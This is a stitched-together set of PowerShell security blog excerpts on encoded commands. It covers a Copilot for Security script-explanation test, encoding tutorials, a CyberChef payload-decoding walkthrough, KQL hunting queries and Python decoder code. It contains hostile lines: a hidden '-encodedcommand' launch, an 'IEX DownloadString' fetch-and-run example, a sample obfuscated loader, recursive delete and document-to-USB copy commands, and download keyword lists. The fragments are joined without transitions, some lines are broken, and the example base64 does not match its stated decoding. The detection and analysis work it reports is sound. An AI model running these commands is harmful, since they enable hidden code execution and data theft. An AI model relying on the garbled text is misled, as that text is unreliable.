✅ Piped command
✅ Basic knowledge around PowerShell
✅ Basic knowledge around Copilot for Security
✅ PowerShell script to disable Network and USB devices
✅ 23-line script
✅ PowerShell script to remove Windows and security updates
✅ 46-line script
✅ PowerShell script for a persistent Credential Phish attack
✅ 29-line script
✅ PowerShell command to stop all other PowerShell sessions
✅ Multi-pipe command
✅ PowerShell command to remove all files and folders within a folder
✅ One-line command
Remove-Item -Path C:\temp\Files -Recurse
✅ PowerShell command to copy doc files to USB drive
✅ One-line command
Copy-Item -Filter *.docx -Path c:\data -Recurse -Destination F:\SanDisk-32GB\files

Below is an article that tests the capability of Copilot for Security to explain PowerShell scripts. The article tests the platform at increasing levels of complexity and observes how it responds 🙂
✅ PowerShell script to perform an attack to live stream a Target's Screen
✅ 112-line script
PS: The prompt was removed from the screenshot to avoid displaying the extensive code, which exceeds 100 lines.
The PowerShell scripts mentioned in the article have been linked for reference, so that the owner gets the credit. The scripts are intended for use by penetration testers, and could be used by threat actors for malicious purposes.
DO NOT run the below commands or scripts in your/other machines

The PowerShell Encoded Commands Tool is a web-based utility designed to simplify the encoding and decoding of PowerShell commands using the EncodedCommand technique. This technique involves converting PowerShell commands into a base64-encoded format, making them less susceptible to detection and modification.
The commands and scripts used in the article have been modified so that the function names, comments and variable names do not explicitly call out the use case of the script. This ensures that Copilot for Security has to decode the PowerShell script without any context about the data. Each test was performed as a separate conversation/session so that the platform cannot reuse the context of the previous test.
In short – Copilot for Security was tested while being blind-folded 🤷
✅ The results were accurate on the first attempt for every test. Even with multiple testing across multiple conversations/sessions – the results were accurate.
✅ The formatting of the input text appears to have been removed – yet it has not affected the outcome.
✅ The test was successful even for a 100+ lines script
✅ For Test 2 – I was hoping it would automatically flag the destination folder (F:\SanDisk-32GB\files) as an external drive. But that could be because the question doesn't explicitly ask about its intent.
✅ The presence of multiple plugins can delay the response time, as Copilot for Security needs to evaluate each one to determine the most suitable plugin for the given prompt. Therefore, it is recommended to use only essential plugins to ensure a faster response.
Sometimes you want to store a PowerShell command in a form that is not readable at first glance. This is called obfuscation: making something unreadable for humans. For example, this could be used when storing a PowerShell command in a Task Scheduler job or something similar.
How to encode your command?
# -EncodedCommand expects base64 over the UTF-16LE bytes of the command, which [Text.Encoding]::Unicode produces
[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($string))


How to decode the encoded command?
To decode the encoded variable, you can use (the bytes are UTF-16LE, so decode with Unicode, not Utf8, or non-ASCII characters come out garbled):
[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($EncodedCommand))

Another method to encode/ decode!
A nice way to also decode and encode your command is via the Base64 Decode and Encode website:
Base64 Decode and Encode – Online

And of course, the same for encoding your command!

How to decode a PowerShell command from a running process?
Microsoft has a nice write-up on how to decode the command of a running process, because PowerShell also stores the running command in its encoded form:
Thanks for reading this short blog, hopefully it was informative and helpful when you need to encode your commands!
#Load System.Web (required in Windows PowerShell; already available in PowerShell 7)
Add-Type -AssemblyName System.Web
#Parameter
$URL = "https%3A%2F%2Fcrescent.sharepoint.com%2Fsites%2Fmarketing%2F2018%2FDocuments%2FInfo%20Mgmt%20v2%2Epdf"
#Decode URL
[System.Web.HttpUtility]::UrlDecode($URL)
#Output: https://crescent.sharepoint.com/sites/marketing/2018/Documents/Info Mgmt v2.pdf

#Alternative without System.Web: the .NET Uri class
$EncodedURL = "https%3A%2F%2Fcrescent.sharepoint.com%2Fpersonal%2Fsalaudeen_crescent_com%Documents%2FAssets%20%26%20Inventory.xlsx"
[system.uri]::UnescapeDataString($EncodedURL)

#Import PowerShell Module for SharePoint Online
Import-Module Microsoft.Online.SharePoint.PowerShell -DisableNameChecking
#Function to Decode URL
Function Decode-URL([string]$URL)
{
    Try {
        #Decode the URL
        Return [Microsoft.SharePoint.Client.Utilities.HttpUtility]::UrlKeyValueDecode($URL)
    }
    catch {
        Return "Error Getting De-codedURL: $($_.Exception.Message)"
    }
}
#Parameter
$URL = "https%3A%2F%2Fcrescent.sharepoint.com%2Fsites%2Fmarketing%2F2018%2FShared%20Documents%2FInformation%20Management%20v2%2Epdf"
#Call the function to decode URL
Decode-URL $URL

Encode URL in PowerShell
#EscapeUriString leaves reserved URI characters such as '&' untouched
$URL = "https://crescent.sharepoint.com/personal/salaudeen_crescent_com/Shared Documents/Assets & Inventory.xlsx"
Write-Host ([URI]::EscapeUriString($URL))

#UrlPathEncode only encodes the path part (spaces etc.), not the query string
$URL = "https://crescent.sharepoint.com/personal/salaudeen_crescent_com/Shared Documents/Assets & Inventory.xlsx"
[System.Web.HttpUtility]::UrlPathEncode($URL)

Salaudeen Rajack
Encoding is something that has existed for decades and is not a concept newly created for information technology. In essence, encoding is the transformation of data into a specific format or structure for secure storage or efficient transmission. In ancient times, civilizations used rudimentary encoding methods like the Caesar cipher to protect sensitive messages from adversaries. As technology advanced, more sophisticated encoding techniques were created, especially since computers could easily decipher the older ones. Cyber adversaries use encoding in a similar way: they want to write code that evades detection. This blog dives into the detection and decoding of encoded PowerShell using Defender for Endpoint data.
PowerShell can be executed in encoded form to obfuscate the commands that have been run. Those encoded executions are classified under MITRE ATT&CK technique T1027.010 (Obfuscated Files or Information: Command Obfuscation). An attacker can use encoding to hide the download of malicious files, or to defeat simple string-matching detections. The goal of this blog is to identify the systems that execute encoded PowerShell and to classify the activity as benign or suspicious.
This blog specifically focuses on base64-encoded PowerShell executions. The base64_decode_tostring() function can be used to decode any base64-encoded string, regardless of the scripting language that is used.
Using the ConvertFrom-SecureString cmdlet:
$SecureString = Read-Host -AsSecureString
$Hex = $SecureString | ConvertFrom-SecureString
Default (hexadecimal) output:
$Hex
01000000d08c9ddf0115d1118c7a00c04fc297eb01000000da4b9d0c09bdb140b3060606f3557e12000000000200000000001066000000010000200000003e5e7e364bba09ff85c69e5ab52d6503c9782f2e6fb280e6d5259adb194d5872000000000e8000000002000020000000fbaff7af38d8a7fa03283907bd428a0160ab0e17748eaef159767f3dac4699c310000000700931ab89b21c663e2d8c55eb62328d40000000883276253b23475ea08afacaba679cc97cfb17a16c8155bcc4f1d4210ebcc7506c4e1d94b94aa18d9454c9795ce4e857a063267027c36f1c8ae1ba64da3d1863
Not sure what you need this format for:
$Hex -replace '..', '\x$&'
\x01\x00\x00\x00\xd0\x8c\x9d\xdf\x01\x15\xd1\x11\x8c\x7a\x00\xc0\x4f\xc2\x97\xeb\x01\x00\x00\x00\xda\x4b\x9d\x0c\x09\xbd\xb1\x40\xb3\x06\x06\x06\xf3\x55\x7e\x12\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x10\x66\x00\x00\x00\x01\x00\x00\x20\x00\x00\x00\x79\x5d\x5a\x40\xed\xde\xc7\xea\xad\x34\xe3\x95\x05\x9b\x6c\x62\xc9\x0f\x46\xa9\xe3\xb2\x8f\x44\xe1\x05\xe4\xd2\xe1\x53\x82\xad\x00\x00\x00\x00\x0e\x80\x00\x00\x00\x02\x00\x00\x20\x00\x00\x00\x9f\x46\x73\x15\x59\x55\x4b\xd6\x49\xc8\x7f\x65\xc6\x65\xf5\x46\xc8\x82\xc7\x2b\x1f\xc0\xac\x85\x09\x29\x57\x53\x0a\xde\x1c\x03\x10\x00\x00\x00\x57\x73\xd9\xfc\xe1\xe0\x00\x63\x33\xcf\x8d\xf1\xd0\xad\xb7\xf0\x40\x00\x00\x00\x8d\x54\x05\xae\x06\x15\x25\x74\xfd\x5c\xf6\x6e\xb3\xce\xf0\xa7\xd6\x32\x6b\xb5\x18\xe8\xd1\x85\xf1\xf2\x45\x13\x8e\xbc\x15\x38\x84\x14\xb1\xdb\x89\x9c\x74\xb2\xa1\xf6\xf8\x48\x1f\x61\x5f\x26\xe9\x2c\x78\x2d\xeb\x3c\x81\x1b\x74\x77\x2a\x5d\x31\x80\x20\xb4
Actual bytes:
$Bytes = [byte[]] -split ($Hex -replace '..', '0x$& ')
"$Bytes"
1 0 0 0 208 140 157 223 1 21 209 17 140 122 0 192 79 194 151 235 1 0 0 0 218 75 157 12 9 189 177 64 179 6 6 6 243 85 126 18 0 0 0 0 2 0 0 0 0 0 16 102 0 0 0 1 0 0 32 0 0 0 121 93 90 64 237 222 199 234 173 52 227 149 5 155 108 98 201 15 70 169 227 178 143 68 225 5 228 210 225 83 130 173 0 0 0 0 14 128 0 0 0 2 0 0 32 0 0 0 159 70 115 21 89 85 75 214 73 200 127 101 198 101 245 70 200 130 199 43 31 192 172 133 9 41 87 83 10 222 28 3 16 0 0 0 87 115 217 252 225 224 0 99 51 207 141 241 208 173 183 240 64 0 0 0 141 84 5 174 6 21 37 116 253 92 246 110 179 206 240 167 214 50 107 181 24 232 209 133 241 242 69 19 142 188 21 56 132 20 177 219 137 156 116 178 161 246 248 72 31 97 95 38 233 44 120 45 235 60 129 27 116 119 42 93 49 128 32 180
Base64:
[Convert]::ToBase64String($Bytes)
AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAA2kudDAm9sUCzBgYG81V+EgAAAAACAAAAAAAQZgAAAAEAACAAAAB5XVpA7d7H6q0045UFm2xiyQ9GqeOyj0ThBeTS4VOCrQAAAAAOgAAAAAIAACAAAACfRnMVWVVL1knIf2XGZfVGyILHKx/ArIUJKVdTCt4cAxAAAABXc9n84eAAYzPPjfHQrbfwQAAAAI1UBa4GFSV0/Vz2brPO8KfWMmu1GOjRhfHyRROOvBU4hBSx24mcdLKh9vhIH2FfJukseC3rPIEbdHcqXTGAILQ=
Round trip:
$Base64 = <your base64> # e.g.: 'AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAA2kudDAm9sUCzBgYG81V+EgAAAAACAAAAAAAQZgAAAAEAACAAAAB5XVpA7d7H6q0045UFm2xiyQ9GqeOyj0ThBeTS4VOCrQAAAAAOgAAAAAIAACAAAACfRnMVWVVL1knIf2XGZfVGyILHKx/ArIUJKVdTCt4cAxAAAABXc9n84eAAYzPPjfHQrbfwQAAAAI1UBa4GFSV0/Vz2brPO8KfWMmu1GOjRhfHyRROOvBU4hBSx24mcdLKh9vhIH2FfJukseC3rPIEbdHcqXTGAILQ='
$Bytes = [System.Convert]::FromBase64String($Base64)
$Hex = -Join $Bytes.Foreach{ $_.ToString('x2') }
$SecureString = $Hex | ConvertTo-SecureString
$SecureString | ConvertFrom-SecureString -AsPlainText   # -AsPlainText requires PowerShell 7 or later
This is the continuation of my previous part 1.
Here we will analyze another base64 code.
Code for practice:
%COMSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand <base64 payload not reproduced on this page>
You can read an interesting base64 pattern cheat sheet at the link below:
https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
We got a base64 code, and we have CyberChef to decode it. After decoding we have a value, but it is mixed with lots of null bytes. So we now need to use the Remove null bytes recipe from CyberChef to remove those.
After removing all the null bytes, we have something human readable. But you may notice that another base64 code is in there. So now we will decode that as well.
After decoding that we got something gibberish. You may think that the red-marked characters are null bytes, but they are actually not. You can also see that the CyberChef magic wand is showing, and when we hover the mouse over it, a "Gzip file detected" message is given.
Using the Gunzip recipe, we got readable PowerShell code.
Going down a bit, we found another base64 code which is XORed with key 35. Let's decode the base64 first, then XOR it with key 35.
We can see one IP address. This is the IOC that the threat actor was communicating with.
So let's summarize what the attacker did.
- The attacker first XORed the IOC with key 35. Then the attacker encoded the resulting value using base64.
- Then the attacker compressed that with gzip (which we undid with the Gunzip recipe). Whatever value he got, he again encoded using base64.
- To that value he added null bytes (the UTF-16LE form PowerShell expects). Then he again encoded that using base64.
If you notice, we just need to reverse this from point 3 to point 1 to get the actual IOC the attacker was communicating with.
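The unwrapping described above, as an added example that is not code from the original post: a Python decoder that first builds a constructed three-layer payload (UTF-16LE base64 around a gzip-base64 loader around a base64 XORed URL) and then peels it in reverse order, 3 to 1. The IOC is a placeholder TEST-NET address and the PowerShell stubs inside the layers are constructed for the sample, not taken from the post.

```python
import base64
import gzip
import re

# The longest base64-looking run in a script is taken as the embedded payload.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")


def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR; the same operation the walkthrough undoes with key 35."""
    return bytes(b ^ key for b in data)


def longest_b64(text: str) -> str:
    return max(B64_RUN.findall(text), key=len)


def build_sample(ioc: str, key: int = 35) -> str:
    """Constructed sample: wraps an IOC in the three layers the post describes.

    inner  : base64(xor(ioc))            inside a small PowerShell stub
    middle : base64(gzip(inner script))  inside a loader stub
    outer  : base64(UTF-16LE(loader))    as passed to -encodedcommand
    """
    inner_b64 = base64.b64encode(xor_bytes(ioc.encode(), key)).decode()
    inner_ps = (f"$k={key};$b=[Convert]::FromBase64String('{inner_b64}');"
                "$u=-join($b|%{[char]($_ -bxor $k)});Invoke-WebRequest $u")
    middle_b64 = base64.b64encode(gzip.compress(inner_ps.encode())).decode()
    loader_ps = (f"$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('{middle_b64}'));"
                 "IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream("
                 "$s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()")
    return base64.b64encode(loader_ps.encode("utf-16-le")).decode()


def unwrap(outer_b64: str, key: int = 35) -> dict:
    """Peels the layers in reverse order (step 3 -> 1 of the summary)."""
    # Layer 3: -encodedcommand payloads are UTF-16LE, which is where the
    # 'null bytes' seen in CyberChef come from; decoding as UTF-16LE removes them.
    loader_ps = base64.b64decode(outer_b64).decode("utf-16-le")
    # Layer 2: the embedded blob should start with the gzip magic bytes 1f 8b.
    blob = base64.b64decode(longest_b64(loader_ps))
    if blob[:2] != b"\x1f\x8b":
        raise ValueError("expected a gzip stream inside the loader")
    inner_ps = gzip.decompress(blob).decode()
    # Layer 1: base64, then single-byte XOR, gives the IOC.
    ioc = xor_bytes(base64.b64decode(longest_b64(inner_ps)), key).decode()
    return {"loader": loader_ps, "inner": inner_ps, "ioc": ioc}
```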
I hope you will learn something new from here.
Thanks. Please Subscribe below.
PowerShell Encoding
Before we can start hunting for encoded PowerShell commands, we need to understand what it is and what its indicators are. For this part it is important that the encoded PowerShell is executed directly; the encoding of files is less interesting in this case. We build our theory on cases in which actors used encoded PowerShell (see section).
For all examples you can use KQL to translate this or any encoded base64 string, using the base64_decode_tostring() function. This works for all base64 strings, not only PowerShell.
let YourEncodedBase64Command ;
Encoded WebRequests
Similar to the previous step, we explicitly search for encoded commands in combination with a different indicator, which yields better results. This time the additional indicator focuses on encoded downloads. This technique is often used by attackers to hide their download actions, or to limit the impact of custom detection rules that are only scoped to plain commands.
The downloads list that is used in this detection:
let DownloadVariables = dynamic(['WebClient', 'DownloadFile', 'DownloadData', 'DownloadString', 'WebRequest', 'Shellcode', 'http', 'https']);
Detailed queries for this step can be found on my GitHub: MDE & Sentinel KQL Query
Custom Detection & Analytics rules base64
To increase the likelihood that an encoded PowerShell command has been executed with malicious intent, you can filter on command lines that contain PowerShell, bypass and one of the encoded PowerShell parameters. Note that this also filters out malicious scripts that do not need to bypass the current execution policy.
let EncodedList = dynamic(['-encodedcommand', '-enc', '-e']);
DeviceProcessEvents
| where ProcessCommandLine has_all ('powershell', 'bypass', EncodedList)
Questions? Feel free to reach out to me on any of my socials.
Investigate encoded PowerShell commands
The second step also shows all the commands that have been executed by each device. This is done by decoding the commands so they can be investigated. The result is listed by DeviceName with the number of unique commands that particular device has executed in the selected timeframe. The image below shows the results of this step.

The question of what defines a malicious PowerShell command is the same as for clear-text executions. But there are a few indicators that can point to suspicious PowerShell usage, such as:
- Downloading Remote Files (directly from an IP address)
- Attempting to bypass execution policies
- Trying to modify registry run keys
- Clearing (security) logs or disabling logging
If you identify one of the above indicators in the query results, take some time to investigate before moving to the next steps.
Found suspicious PowerShell Executions?
If you have found suspicious PowerShell executions in your environment, it is recommended to run some incident response queries to determine the impact. In the GitHub repository, the DFIR category contains queries that quickly list malicious activities.
Queries for this step can be found on my GitHub: MDE & Sentinel KQL Query
Reconnaissance Activities
In this step we build further upon our previous queries to look specifically for reconnaissance activities. We now enrich the previous query with commands that can be related to recon activities. For this step a predefined list of recon commands is defined:
let TimeFrame = <n>h; // Customizable: h = hours, d = days
// ... the decoded command line is matched against the Recon variables (full query on GitHub)
Detailed queries for this step can be found on my GitHub: MDE & Sentinel KQL Query
How to Use
1. Enter PowerShell Command:
- Input your PowerShell command into the designated text area.
2. Encode or Decode:
- Click the "Encode" or "Decode" button, depending on your desired operation.
- The output area will display the result of the encoding or decoding process.
3. Copy to Clipboard:
- Click the "Copy to Clipboard" button to easily copy the encoded or decoded command for use in other environments.
List the devices that execute encoded PowerShell
In this step we list the devices that execute PowerShell, ordered by the number of encoded PowerShell commands executed. This is done to analyse the encoded PowerShell behaviour in the tenant and which parameters are used. It can give an indication of which device needs to be investigated further. Executing encoded scripts is not necessarily suspicious; several legitimate solutions use it in the wild, for example to limit the script size.
The number of encoded PowerShell executions can differ a lot between tenants, so this indication can shed some light on the current situation and on whether we need to apply filters to limit the results.

The query (below) investigates DeviceProcessEvents for PowerShell executions. The next step is to check whether the command line contains any of the parameters in the EncodedList. If so, we extract the base64 string from the command line using a regex. This string is then decoded (but not used yet). Lastly we use the summarize operator to get the count for each device.
let TimeFrame = <n>d; // Customizable: h = hours, d = days
Example
powershell.exe -exec bypass -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHKACWB0AGUAbQAuAEAZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKAKQAUAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAAA6ACAALwA0ADUALgAxADMANgAuADIAMwAwACAWAADEAOgA0ADAAMAAwACAAyADMANABSADIAMWAnACkAOwA=
Decoded:
powershell.exe -exec bypass -enc IEX (New-Object NetWebclient)DownloadString('http://127.0.0.1:32467/')
Based on the example we can see that adversaries use PowerShell on the command line with a parameter to execute encoded PowerShell. This parameter can take different forms: -encodedcommand, -enc or -e. Note that this execution also performs a bypass, which is interesting for later detection.
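An added example, not from any of the posts collected on this page, that ties the encoding section (base64 over UTF-16LE, as in the "How to encode your command" snippet) to the hunting steps above: it decodes the -encodedcommand/-enc/-e payload from a command line, applies the post's bypass plus DownloadVariables logic, and summarizes per device over constructed DeviceProcessEvents rows. The device names, command lines and TEST-NET URL are constructed sample data.

```python
import base64
import re

# Parameter spellings the hunting post lists (-encodedcommand, -enc, -e).
# PowerShell accepts further abbreviations; extend the alternation for production use.
FLAG_RE = re.compile(r"(?i)(?:^|\s)(?:-encodedcommand|-enc|-e)\s+([A-Za-z0-9+/=]+)")
# The post's DownloadVariables list, used here as the 'encoded WebRequests' indicator.
DOWNLOAD_VARIABLES = ("WebClient", "DownloadFile", "DownloadData", "DownloadString",
                      "WebRequest", "Shellcode", "http", "https")


def encode_command(script: str) -> str:
    """What -EncodedCommand expects: base64 over the UTF-16LE bytes of the script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command_line(cmdline: str):
    """Returns the decoded script if the command line carries an encoded payload, else None."""
    match = FLAG_RE.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not valid base64 / not UTF-16LE: leave it for manual review


def triage(cmdline: str) -> dict:
    """Mirrors the post's custom-detection logic: encoded + bypass + download indicator."""
    decoded = decode_command_line(cmdline)
    bypass = "bypass" in cmdline.lower()
    hits = [v for v in DOWNLOAD_VARIABLES if decoded and v.lower() in decoded.lower()]
    return {"decoded": decoded, "bypass": bypass, "download_hits": hits,
            "suspicious": bool(hits) and bypass}


def summarize(events) -> dict:
    """Per-device counts, like the post's summarize step over DeviceProcessEvents."""
    out = {}
    for device, cmdline in events:
        row = out.setdefault(device, {"encoded": 0, "suspicious": 0})
        t = triage(cmdline)
        row["encoded"] += t["decoded"] is not None
        row["suspicious"] += t["suspicious"]
    return out


# Constructed sample rows (DeviceName, ProcessCommandLine); not real telemetry.
SAMPLE_EVENTS = [
    ("WS01", "powershell.exe -exec bypass -enc " + encode_command(
        "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10:8080/')")),
    ("WS02", "powershell.exe -NoProfile -EncodedCommand " + encode_command(
        "Get-Service | Where-Object Status -eq Running")),
    ("WS03", "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"),
]
```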
Threat Reports containing encoded base64 examples
Features
- Encode and Decode PowerShell Commands:
- Easily encode your PowerShell commands to generate EncodedCommand strings suitable for use in various scenarios.
- Decode EncodedCommand strings back into the original PowerShell commands for analysis or modification.
- The tool provides a clean and intuitive interface with text areas for input and output, making it accessible to users with varying levels of PowerShell expertise.
3. Copy to Clipboard:
- Quickly copy the encoded or decoded result to the clipboard with the “Copy to Clipboard” button, streamlining the process of integrating the commands into scripts or other PowerShell environments.
Considerations
- UTF-16LE Encoding:
The tool ensures proper encoding and decoding, including conversion to UTF-16LE format as required for PowerShell EncodedCommand strings.
- Security Awareness:



